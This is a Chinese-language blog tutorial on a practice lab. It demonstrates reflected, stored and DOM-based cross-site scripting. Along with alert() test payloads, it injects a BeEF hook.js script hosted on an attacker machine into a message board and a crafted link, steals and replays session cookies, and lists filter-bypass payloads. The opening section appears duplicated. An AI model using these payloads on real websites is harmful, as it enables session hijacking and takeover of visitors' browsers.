<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;http://192.168.28.150:3000/hook.js&quot;&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/images/1660273246927-955ad279-5970-48da-aeea-f60169d3aa66.png" alt="img"></p>
<p>获取访问留言板的电脑的主机信息</p>
<p><img src="/images/1660273284160-d43efe33-735d-47ed-afd2-0fc84bd2a331.png" alt="img"></p>
<p>同样，换个虚拟机发起请求</p>
<p><img src="/images/1660273396042-19900f44-d5a1-43d4-b1e4-ea70fcf991c0.png" alt="img"></p>
<p>攻击机kali获取到主机信息</p>
<p><img src="/images/1660273432143-abf8f51a-aa13-4153-ba8c-92b64387d022.png" alt="img"></p>
<p>同样，如果只是反射型的xss，只要让受害者点击恶意链接，也可造成同样效果</p>
<p>可以使用反射型xss(get)进行试验，恶意链接如下：</p>
<p><a target="_blank" rel="noopener" href="http://192.168.43.100/DX/pikachu/vul/xss/xss_reflected_get.php?message=%3C/script%3E&submit=submit">http://192.168.43.100/DX/pikachu/vul/xss/xss_reflected_get.php?message&#x3D;%3Cscript+src%3D%22http%3A%2F%2F192.168.28.153%3A3000%2Fhook.js%22%3E%3C%2Fscript%3E&amp;submit&#x3D;submit</a></p>
<p>攻击机获取到主机信息</p>
<p><img src="/images/1660274095597-5d0a5c5d-ae55-4c06-9db9-cee2268a2fb8.png" alt="img"></p>
<h1 id="反射型xss"><a href="#反射型xss" class="headerlink" title="反射型xss"></a>反射型xss</h1><p>是一种非持久化的xss，即攻击行为在网页刷新后就不存在了(但如果是get请求需要将payload删除)，攻击行为只会发生在客户端，即浏览器，并不会将攻击代码存储到网站服务器中。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$input = $_GET[&quot;test&quot;];</span><br><span class="line">echo &quot;&lt;div&gt;&quot;.$input.&quot;&lt;/div&gt;&quot;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>可控点在<div>标签里面</div></p>
<p><img src="/images/1662617312740-0ed9d6ef-f86b-42b1-a38f-1e4bacd65d8f.png" alt="img"></p>
<p>直接插入payload</p>
<p><img src="/images/1662617482276-c28ec953-08dc-4b2a-b974-786779e9b345.png" alt="img"></p>
<p>反射型xss就是把用户输入的数据“反射”给浏览器，也就是说，用户在访问恶意链接时，才能攻击成功，反射型xss也叫做非持久性xss。</p>
<p>反射型xss需要服务端解析响应参与，但输入的payload并不存储在服务器上。</p>
<h2 id="反射型xss-get"><a href="#反射型xss-get" class="headerlink" title="反射型xss(get)"></a>反射型xss(get)</h2><p>可以f12查看可控点</p>
<p><img src="/images/1660476633506-b93b6ac7-2f8c-476c-957e-b738bcea1750.png" alt="img"></p>
<p>xss的验证方法基本上就是拿着payload见框就插</p>
<p>该题首先发现payload压根输不满</p>
<p><img src="/images/1660184936621-b04dfb7b-3a7b-4f43-8402-b665448d06e4.png" alt="img"></p>
<p>这里有多种解决方法。</p>
<p>1.f12直接更改前端代码。</p>
<p>将maxlenth字段删除</p>
<p><img src="/images/1660185365090-0dcdec0a-d027-4b2f-959b-fabf9b5d6230.png" alt="img"></p>
<p><img src="/images/1660185501321-c7b0d245-99a4-4105-b5da-a72d56c0036c.png" alt="img"></p>
<p>2.抓包后修改放包。</p>
<p>抓包后直接修改请求。注意有些情况需要url编码。</p>
<p><img src="/images/1660185676861-9595165b-756c-46cc-afb1-ddf2ead09de2.png" alt="img"></p>
<p>3.因为是get请求，可以直接在地址栏修改</p>
<p><img src="/images/1660185993458-1c631800-176a-4506-a867-489816d8e492.png" alt="img"></p>
<p>成功弹窗</p>
<p><img src="/images/1660185960775-3d08b7c5-6199-44cf-9065-a0c127699488.png" alt="img"></p>
<h2 id="反射型xss-post"><a href="#反射型xss-post" class="headerlink" title="反射型xss(post)"></a>反射型xss(post)</h2><p>post请求即发送的payload并不会显示到url地址栏中，而是放在数据包的body部分</p>
<p><img src="/images/1660186338853-0af903af-6785-46b8-9d4c-5af5fdb84308.png" alt="img"></p>
<p>根据提示考察的是通过xss获取cookie，先登录。</p>
<p>首先alert一个弹窗看看是否存在xss</p>
<p><img src="/images/1660186626342-0cc88d27-f63f-4f2a-9329-c4027d952498.png" alt="img"></p>
<p>可以看出post类型的反射型xss</p>
<p><img src="/images/1660186598976-013e91db-3e38-4995-a190-ae926e8eb50c.png" alt="img"></p>
<p>插入获取cookie的payload</p>
<script>alert(document.cookie)</script>

<h3 id="关于document-cookie"><a href="#关于document-cookie" class="headerlink" title="关于document.cookie"></a>关于document.cookie</h3><p>cookie是用于维持用户登录状态和行为的一个东东，获取到用户的cookie就相当于获取到了用户的用户名和密码。</p>
<p>JavaScript 可以使用 document.cookie 属性来创建 、读取、及删除 cookie。</p>
<p>document.cookie可以读取当前cookie</p>
<p><img src="/images/1660187377093-761310f5-2c3c-4592-8546-546236b52087.png" alt="img"></p>
<p>成功获取cookie</p>
<p><img src="/images/1660186806768-2ad9856c-676a-46a2-b34b-e8f8919fd84a.png" alt="img"></p>
<h3 id="cookie利用"><a href="#cookie利用" class="headerlink" title="cookie利用"></a>cookie利用</h3><p>这里可以体会一下cookie的作用</p>
<p>首先抓包保存登录后的后台路径和cookie值</p>
<p><img src="/images/1660188619423-f9acd23a-bf2f-496e-bcac-e579b485d986.png" alt="img"></p>
<p>退出登录，重新对后台路径发起请求，并添加cookie</p>
<p><img src="/images/1660188991267-eb771206-5a58-44f3-99df-fa44d9d722dc.png" alt="img"></p>
<p>成功登录</p>
<p><img src="/images/1660189006511-4813c1c4-9010-4789-8da6-56a049bc66ab.png" alt="img"></p>
<h1 id="存储型xss"><a href="#存储型xss" class="headerlink" title="存储型xss"></a>存储型xss</h1><p>持久型跨站点脚本</p>
<p>持久型主要体现在其xss攻击代码会保存至服务器网站数据库中，所以当存储型xss发生时，所有访问受攻击页面的用户都会受到影响。</p>
<p>可以f12查看可控点</p>
<p><img src="/images/1660476725683-a4db4011-7712-44b5-b103-b66429005e53.png" alt="img"></p>
<p>往留言板中插入恶意payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(&#x27;xss&#x27;)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/images/1660270330674-45d49425-c4f4-4192-b6be-e8ede2722051.png" alt="img"></p>
<p>出现弹窗</p>
<p><img src="/images/1660270354073-bda7e2e1-c31f-4596-a317-c39de9586345.png" alt="img"></p>
<p>可以发现已经存储到服务器数据库</p>
<p><img src="/images/1660270377285-9b1c3bac-230c-451b-b8bc-165e8fc53a37.png" alt="img"></p>
<p>此时更换一个浏览器再次访问该留言板地址</p>
<p>依然会出现弹窗</p>
<p><img src="/images/1660270428509-83838f57-b9c4-456f-8037-5c5b003c1397.png" alt="img"></p>
<p>存储型xss的危害比反射型xss危害大得多，当服务器被植入存储型xss时，可被用来钓鱼，窃取cookie，用户登录凭证等。</p>
<h2 id="存储型xss利用"><a href="#存储型xss利用" class="headerlink" title="存储型xss利用"></a>存储型xss利用</h2><p>这里可以直观的体现一下存储型xss的作用</p>
<p>攻击机使用的是kali系统(免费，可直接下载)</p>
<p>apt install beef-xss安装BeeF攻击框架，这里就不详细展开了，安装好后web页面如下图。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get update</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt install beef-xss</span><br></pre></td></tr></table></figure>

<p><img src="/images/1660272799566-358ac5e0-a1d0-41e1-8baf-fddcd4d5bef0.png" alt="img"></p>
<p>登录进入后台，用户名为beef</p>
<p><img src="/images/1660272885067-9a84d647-c2e3-4e2f-a726-de1e9d91ccea.png" alt="img"></p>
<p>启动时命令行会给出web页面地址和攻击payload</p>
<p><img src="/images/1660273051219-eacadab3-5b6a-41e0-81a0-25102f9c3337.png" alt="img"></p>
<p>payload换上攻击机的ip地址，直接上</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script src=&quot;http://192.168.28.153:3000/hook.js&quot;&gt;&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/images/1660273246927-955ad279-5970-48da-aeea-f60169d3aa66.png" alt="img"></p>
<p>获取访问留言板的电脑的主机信息</p>
<p><img src="/images/1660273284160-d43efe33-735d-47ed-afd2-0fc84bd2a331.png" alt="img"></p>
<p>同样，换个虚拟机发起请求</p>
<p><img src="/images/1660273396042-19900f44-d5a1-43d4-b1e4-ea70fcf991c0.png" alt="img"></p>
<p>攻击机kali获取到主机信息</p>
<p><img src="/images/1660273432143-abf8f51a-aa13-4153-ba8c-92b64387d022.png" alt="img"></p>
<p>同样，如果只是反射型的xss，只要让受害者点击恶意链接，也可造成同样效果</p>
<p>可以使用反射型xss(get)进行试验，恶意链接如下：</p>
<p><a target="_blank" rel="noopener" href="http://192.168.43.100/DX/pikachu/vul/xss/xss_reflected_get.php?message=%3C/script%3E&submit=submit">http://192.168.43.100/DX/pikachu/vul/xss/xss_reflected_get.php?message&#x3D;%3Cscript+src%3D%22http%3A%2F%2F192.168.28.153%3A3000%2Fhook.js%22%3E%3C%2Fscript%3E&amp;submit&#x3D;submit</a></p>
<p>攻击机获取到主机信息</p>
<p><img src="/images/1660274095597-5d0a5c5d-ae55-4c06-9db9-cee2268a2fb8.png" alt="img"></p>
<h1 id="DOM型xss"><a href="#DOM型xss" class="headerlink" title="DOM型xss"></a>DOM型xss</h1><h2 id="DOM概述"><a href="#DOM概述" class="headerlink" title="DOM概述"></a>DOM概述</h2><p>简单来说，DOM文档就是一份XML文档，当有了DOM标准之后，DOM便将前端html代码化为一个树状结构，方便程序和脚本能够轻松的动态访问和更新这个树状结构的内容、结构以及样式，且不需要经过服务端，所以DOM型xss在js前端自己就可以完成数据的输入输出，不与服务器产生交互，这样来说DOM型xss也可以理解为反射性xss。</p>
<p>DOM XSS与反射性XSS、存储型XSS的主要区别在于DOM XSS的XSS代码不需要服务端解析响应的直接参与，触发XSS的是浏览器端的DOM解析。一般不与服务器交互，所以输入的payload也不会存储在服务器上。</p>
<p>但其实质是通过修改页面的DOM节点形成的xss，所以在后面的xss-x中，可以发现与服务器产生了交互，但是由于还是通过修改页面的DOM节点形成的xss，所以也归为dom型xss。</p>
<p>有关DOM的可以参考<a target="_blank" rel="noopener" href="https://www.runoob.com/htmldom/htmldom-tutorial.html">https://www.runoob.com/htmldom/htmldom-tutorial.html</a></p>
<h3 id="test1"><a href="#test1" class="headerlink" title="test1"></a>test1</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line">function test()&#123;</span><br><span class="line">	var str = document.getElementById(&quot;test&quot;).value;</span><br><span class="line">	document.getElementById(&quot;t&quot;).innerHTML = &quot;&lt;a href=&#x27;&quot;+str+&quot;&#x27; &gt;testLink&lt;/a&gt;&quot;;</span><br><span class="line">&#125;</span><br><span class="line">&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">&lt;div id=&quot;t&quot; &gt;&lt;/div&gt;</span><br><span class="line">&lt;input type=&quot;text&quot; id=&quot;test&quot; value=&quot;&quot; /&gt;</span><br><span class="line">&lt;input type=&quot;button&quot; id=&quot;s&quot; value=&quot;write&quot; onclick=&quot;test()&quot; /&gt;</span><br></pre></td></tr></table></figure>

<p>这段代码，就是将输入到id&#x3D;test的文本框的文本内容，点击write按钮后，执行test()函数，将输入的文本内容，放到a标签的href中显示到前端（<a href="xxxxxxxxxx">testLink</a>）</p>
<p><img src="/images/1662618457481-02526d36-c474-4b34-930a-88bcc7e994ad.png" alt="img"></p>
<p>随便输入一个hello world，点击write</p>
<p>可以发现源代码中出现一个a标签，href中就是我们输入的内容</p>
<p><img src="/images/1662618556441-26f7763e-33a1-44be-b399-e354008e787d.png" alt="img"></p>
<p>而且可以抓包，当我们点击write时，并不会抓到数据包，仅在前端html中输出</p>
<h3 id="插入payload"><a href="#插入payload" class="headerlink" title="插入payload"></a>插入payload</h3><p>由于可控点在a标签中的href属性，需要先将a标签闭合或使用事件触发</p>
<h5 id="事件触发"><a href="#事件触发" class="headerlink" title="事件触发"></a>事件触发</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27; onclick=alert(/xss/) //</span><br></pre></td></tr></table></figure>

<p>首先用一个单引号闭合掉href的第一个单引号，然后插入一个onclick事件，最后用注释符“&#x2F;&#x2F;”注释掉单引号。点击新生连接，脚本将被执行。</p>
<p><img src="/images/1662619049036-41394025-6721-467d-9b09-b15fde9a206b.png" alt="img"></p>
<h5 id="闭合a标签"><a href="#闭合a标签" class="headerlink" title="闭合a标签"></a>闭合a标签</h5><p>但使用<script></script>时并不会弹窗</p>
<p>a标签里并不解析<script>标签</p>
<p><img src="/images/1662621427146-b9300938-f2ee-4a3e-a152-fe2c26a4756e.png" alt="img"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27;&gt;&lt;img src=# onerror=alert(/xss1/) /&gt;&lt;&#x27;</span><br></pre></td></tr></table></figure>

<p><img src="/images/1662621081022-4933e3f5-efac-4491-900c-af86413897e9.png" alt="img"></p>
<h3 id="test2"><a href="#test2" class="headerlink" title="test2"></a>test2</h3><p>这段代码实现了一个简单的页面，允许用户输入昵称并在页面上显示</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;title&gt;DOM XSS Attack Demo&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">    &lt;h1&gt;Welcome!&lt;/h1&gt;</span><br><span class="line">    &lt;p&gt;Please enter your nickname:&lt;/p&gt;</span><br><span class="line">    &lt;form&gt;</span><br><span class="line">        &lt;input id=&quot;nickname&quot; type=&quot;text&quot; /&gt;</span><br><span class="line">        &lt;button type=&quot;submit&quot;&gt;Submit&lt;/button&gt;</span><br><span class="line">    &lt;/form&gt;</span><br><span class="line">    &lt;p&gt;Your nickname is: &lt;span id=&quot;display&quot;&gt;&lt;/span&gt;&lt;/p&gt;</span><br><span class="line">    &lt;script&gt;</span><br><span class="line">        const form = document.querySelector(&#x27;form&#x27;);</span><br><span class="line">        const nicknameInput = document.querySelector(&#x27;#nickname&#x27;);</span><br><span class="line">        const display = document.querySelector(&#x27;#display&#x27;);</span><br><span class="line"></span><br><span class="line">        form.addEventListener(&#x27;submit&#x27;, (event) =&gt; &#123;</span><br><span class="line">            event.preventDefault();</span><br><span class="line"></span><br><span class="line">            const nickname = nicknameInput.value;</span><br><span class="line">            display.innerHTML = nickname;</span><br><span class="line">        &#125;);</span><br><span class="line">    &lt;/script&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<p>随便输入一串字符</p>
<p><img src="/images/image-20230107224210191.png" alt="image-20230107224210191"></p>
<p>抓包也没有与服务器交互</p>
<p>直接通过前端的js代码将输入框的东西输出到浏览器</p>
<h2 id="普通DOM型xss"><a href="#普通DOM型xss" class="headerlink" title="普通DOM型xss"></a>普通DOM型xss</h2><p><img src="/images/1660291585340-ecdca394-b111-4505-b7b3-f72b0df0f35e.png" alt="img"></p>
<p>由于其将输入的字符放进了html标签中的属性中，所以该类型xss攻击需要将标签闭合，并且加入自己的payload.</p>
<p>即下面的hello我们是可控的。需要通过将a标签闭合，或通过事件触发，再放入自己的恶意payload才可以造成xss</p>
<p><img src="/images/1660291862424-93c60fa9-14f7-4ffd-afa2-c890fdbba430.png" alt="img"></p>
<p>a标签可以接受onclick属性，表示点击行为，点击就触发</p>
<p>所以可以接上onclick=alert('xss')>把a的右标签也闭合了</p>
<p>所以payload为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27; onclick=alert(&#x27;xss&#x27;)&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/images/1660295072228-82da965b-ff25-475a-bd72-5b2f350f3421.png" alt="img"></p>
<p><img src="/images/1660295264667-593a7c3d-8210-4392-bada-e495fbaeac13.png" alt="img"></p>
<p>点击弹窗</p>
<p><img src="/images/1660295272768-f1c011f0-8ce5-48f9-a308-440eef974a84.png" alt="img"></p>
<p>反正只要能凑上闭合，能解析，怎么样都行</p>
<h2 id="DOM型xss-x"><a href="#DOM型xss-x" class="headerlink" title="DOM型xss-x"></a>DOM型xss-x</h2><h3 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h3><p>上述的dom型xss可以发现，输入的payload，并不与服务器交互，也不显示在url中。</p>
<p><img src="/images/1662622837438-afaae957-f195-46b4-b2df-57311da7e03c.png" alt="img"></p>
<p>dom型xss-x，可以发现url中存在输入的内容，可以将带有恶意payload的url发给被攻击者钓鱼</p>
<p><img src="/images/1662622629801-cb87a0c8-53ea-4fa5-ac4b-adb43578ca1d.png" alt="img"></p>
<p>从源码可以看出，输入到文本框的内容，会先通过get请求将内容发送到服务端</p>
<p><img src="/images/1662623756155-e22ac861-92b7-4ed3-8eae-d1db2cb8d455.png" alt="img"></p>
<p>服务端接收到get请求的内容，调用domxss()函数，通过修改页面的DOM节点形成新的html传回给客户端的浏览器，所以也归为为DOM XSS</p>
<p><img src="/images/1662624234083-f986c7ba-f92f-4f3f-a2f7-ec93690f21bf.png" alt="img"></p>
<p><img src="/images/1662624224148-501c0bca-1a61-49f1-badd-fb029a0f75e0.png" alt="img"></p>
<p>后续利用同DOM型xss</p>
<p>随便输入一串字符串，然后点击按钮，可以看出添加到了<a>标签中</p>
<p><img src="/images/image-20230107233737057.png" alt="image-20230107233737057"></p>
<p>同上题需要凑闭合</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27; onclick=alert(&#x27;xss&#x27;)&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20230107235014624.png" alt="image-20230107235014624"></p>
<h2 id="DOM型xss和传统XSS的区别"><a href="#DOM型xss和传统XSS的区别" class="headerlink" title="DOM型xss和传统XSS的区别"></a>DOM型xss和传统XSS的区别</h2><p>DOM型XSS是一种比较特殊的XSS攻击，它利用浏览器中的DOM（文档对象模型）漏洞来实现攻击。</p>
<p>1.DOM型XSS不依赖于服务器的输出</p>
<p>2.DOM型XSS攻击的源代码不会被服务器端的代码直接输出，而是通过浏览器的JavaScript代码在客户端进行解析和执行。</p>
<p>3.DOM型XSS攻击的攻击范围更广，可以通过各种手段（如邮件、聊天工具、社交媒体等）将攻击代码传递给用户，从而对用户的浏览器进行攻击。</p>
<p>4.不经过后端,DOM—based XSS漏洞是基于文档对象模型Document Objeet Model,DOM)的一种漏洞,dom-xss是通过url传入参数去控制触发的。(可以看作是反射型的特殊情况)</p>
<p>与DOM型XSS相比，反射型XSS的区别在于：</p>
<p>1.反射型XSS依赖于服务器的输出</p>
<p>2.反射型XSS攻击的源代码会被服务器端的代码直接输出到浏览器端，然后在浏览器中执行。</p>
<p>3.反射型XSS攻击的攻击范围较小，通常是通过邮件、聊天工具或社交媒体将攻击链接发送给目标用户，让用户自己打开链接进行攻击。</p>
<p>总之，DOM型XSS攻击更加隐蔽，而反射型XSS攻击更容易被发现，但两者都可能对用户造成严重的安全威胁。</p>
<h1 id="XSS之过滤"><a href="#XSS之过滤" class="headerlink" title="XSS之过滤"></a>XSS之过滤</h1><p><img src="/images/image-20230108191822262.png" alt="image-20230108191822262"></p>
<p>需要绕过过滤</p>
<p>经过尝试，该题过滤的是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script</span><br></pre></td></tr></table></figure>

<p>当遇到<script时会直接被去除</p>
<p><img src="/images/image-20230108203249590.png" alt="image-20230108203249590"></p>
<h2 id="解题"><a href="#解题" class="headerlink" title="解题"></a>解题</h2><p>下面会列举几个绕过的方式，要是有其他的方式自行查阅</p>
<h3 id="大小写绕过"><a href="#大小写绕过" class="headerlink" title="大小写绕过"></a>大小写绕过</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;sCript&gt;&lt;/sCriPt&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20230108212120454.png" alt="image-20230108212120454"></p>
<p>可以看到成功解析为<script>标签</p>
<p>payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;sCrIPT&gt;alert(123)&lt;/sCrIPt&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20230108211941551.png" alt="image-20230108211941551"></p>
<h3 id="双写绕过"><a href="#双写绕过" class="headerlink" title="双写绕过"></a>双写绕过</h3><p>题目可以发现<script会被去除，所以可以用来构造payload</p>
<p>双写绕过原理很简单，可以做个测试</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Hello&lt;scriptWorld</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20230108213754256.png" alt="image-20230108213754256"></p>
<p>可以看到<script被去掉，剩下来HelloWorld</p>
<p>当过滤规则只替换一次且是替换为空<script时，就可以使用双写绕过</p>
<p>测试</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Hello&lt;scri&lt;scriptptWorld</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20230108220509951.png" alt="image-20230108220509951"></p>
<p>可以看到该题并不能使用简单的双写绕过，需要配合其他绕过方式</p>
<h3 id="各类标签绕过"><a href="#各类标签绕过" class="headerlink" title="各类标签绕过"></a>各类标签绕过</h3><h4 id="img标签"><a href="#img标签" class="headerlink" title="img标签"></a>img标签</h4><p>除了<script></script>还可以使用其他的标签进行利用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;&quot; onerror=alert(123)&gt;</span><br><span class="line"></span><br><span class="line">&lt;img src=&quot;x&quot; onerror=alert(`1`);&gt;</span><br><span class="line"></span><br><span class="line">&lt;img src=&quot;x&quot; onerror=alert(`1`)&gt;</span><br><span class="line"></span><br><span class="line">&lt;img src=&quot;1&quot; onerror=&#x27;alert(1)&#x27;;&gt;</span><br><span class="line"></span><br><span class="line">&lt;img src=&quot;1&quot; onerror=&#x27;alert(1)&#x27;&gt;</span><br></pre></td></tr></table></figure>

<p>该payload表示当img调用src的图片失败，则触发onerror行为，执行alert(123)</p>
<p><img src="/images/image-20230108222853591.png" alt="image-20230108222853591"></p>
<h4 id="SVG标签"><a href="#SVG标签" class="headerlink" title="SVG标签"></a>SVG标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;svg onload=alert(1)&gt;</span><br><span class="line"></span><br><span class="line">&lt;svg onload=alert(1)&gt;&lt;/svg&gt;</span><br><span class="line"></span><br><span class="line">&lt;svg onload=alert(`1`)&gt;&lt;/svg&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20230108224804638.png" alt="image-20230108224804638"></p>
<h4 id="a标签"><a href="#a标签" class="headerlink" title="a标签"></a>a标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;&quot; onclick=alert(123)&gt;123&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20230109085110147.png" alt="image-20230109085110147"></p>
<p>点击后触发</p>
<p><img src="/images/image-20230109085127282.png" alt="image-20230109085127282"></p>
<h4 id="input标签"><a href="#input标签" class="headerlink" title="input标签"></a>input标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;input onfocus=alert(123)&gt;</span><br><span class="line"></span><br><span class="line">&lt;input onfocus=&quot;alert(&#x27;xss&#x27;);&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>onfocus表示鼠标放上去触发</p>
<p><img src="/images/image-20230109085300848.png" alt="image-20230109085300848"></p>
<h4 id="iframe标签"><a href="#iframe标签" class="headerlink" title="iframe标签"></a>iframe标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;iframe onload=alert(123)&gt;&lt;/iframe&gt;</span><br><span class="line"></span><br><span class="line">&lt;iframe onload=alert(123)&gt;</span><br><span class="line"></span><br><span class="line">&lt;iframe onload=alert(123);&gt;&lt;/iframe&gt;</span><br></pre></td></tr></table></figure>

<p>onload:当页面加载完毕时执行代码</p>
<p><img src="/images/image-20230109085540498.png" alt="image-20230109085540498"></p>
<h4 id="audio标签"><a href="#audio标签" class="headerlink" title="audio标签"></a>audio标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;audio src=1 onerror=alert(1)&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20230109090052786.png" alt="image-20230109090052786"></p>
<p><img src="/images/image-20230109090104388.png" alt="image-20230109090104388"></p>
<h4 id="video标签"><a href="#video标签" class="headerlink" title="video标签"></a>video标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;video src=x onerror=alert(111)&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20230109090247285.png" alt="image-20230109090247285"></p>
<h4 id="button标签"><a href="#button标签" class="headerlink" title="button标签"></a>button标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;button onfocus=alert(1)&gt;</span><br><span class="line">&lt;button onclick=alert(1)&gt;</span><br></pre></td></tr></table></figure>

<p>onclick点击触发</p>
<p><img src="/images/image-20230109090328767.png" alt="image-20230109090328767"></p>
<h4 id="object标签"><a href="#object标签" class="headerlink" title="object标签"></a>object标签</h4><p>该标签需要配合data:&#x2F;&#x2F;text伪协议利用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;object data=&quot;data:text/html;base64,PHNjcmlwdD5hbGVydCgxMjMpPC9zY3JpcHQ+&quot;&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20230109090507237.png" alt="image-20230109090507237"></p>
<p><img src="/images/image-20230109090547150.png" alt="image-20230109090547150"></p>
<p><img src="/images/image-20230109090602207.png" alt="image-20230109090602207"></p>
<h3 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h3><p>还有其他的绕过方式，比如其他的标签，实体编码绕过，闭合等方式，可自行查阅搭建靶场进行绕过，后续题目也会涉及。</p>
<h2 id="参考-1"><a href="#参考-1" class="headerlink" title="参考"></a>参考</h2><p><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/E3G5juHSQjzRNSZcgiTmQA">https://mp.weixin.qq.com/s/E3G5juHSQjzRNSZcgiTmQA</a></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/339348.html">https://www.freebuf.com/articles/web/339348.html</a></p>
<h1 id="xss之js输出"><a href="#xss之js输出" class="headerlink" title="xss之js输出"></a>xss之js输出</h1><p>根据提示输入tmac</p>
<p><img src="/images/image-20230109094736189.png" alt="image-20230109094736189"></p>
<p>前端查看js代码</p>
<p><img src="/images/image-20230109094912346.png" alt="image-20230109094912346"></p>
